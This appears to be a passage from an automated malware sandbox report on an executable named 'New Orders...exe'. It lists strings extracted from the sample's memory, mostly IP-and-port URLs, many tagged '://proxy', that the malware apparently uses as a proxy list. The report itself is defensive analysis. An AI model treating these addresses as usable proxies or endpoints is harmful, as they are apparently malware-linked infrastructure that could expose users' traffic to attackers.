                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.240.153.165:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999i7
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.130.2:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.130.2:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.135.17:18302
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.135.17:18302://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.137.35:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.137.35:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.162:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.139.162:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.200:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.144.30.200:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.162.232.15:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.162.232.15:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.200:35396
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.200:35396://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:59559
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:59559://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:11720
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:11720://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:39095
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.82:39095://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:18646
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:18646://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297CF000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:24787
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:24787://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:59524
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.93:59524://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:8896://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:39782
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:39782://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:60964
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:60964://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.197.146:55137
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.197.146:55137://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:45366
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29B4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:45366://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:29618://proxy8
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149://proxyx
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.208.70:14282
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.208.70:14282://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.209.155:14455
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.209.155:14455://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25468000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.211.197:14921
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.211.197:14921://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.214.20:15864
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.214.20:15864://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.92:17328
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.92:17328://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.229.19:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.229.19:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD270EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128Ge
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.201:4444
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.201:4444://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.200.151.158:8192://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.247:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.247:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.248.35.153:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.248.35.153:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.21.200:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.21.200:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.113.238:18545
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.8.87.43:4444
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.8.87.43:4444://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.113.73.38:9331
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.113.73.38:9331://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2676C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2676C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.209.187:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.145.209.187:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.150.69.56:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.150.69.56:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.159.94:46195
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.159.94:46195://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.182.187.78:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.182.187.78:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25C3A000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.35.70:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.35.70:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208.226:8180
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.213.208.226:8180://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.247.173.17:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.247.173.17:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25517
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25517://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25900
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:25900://proxy
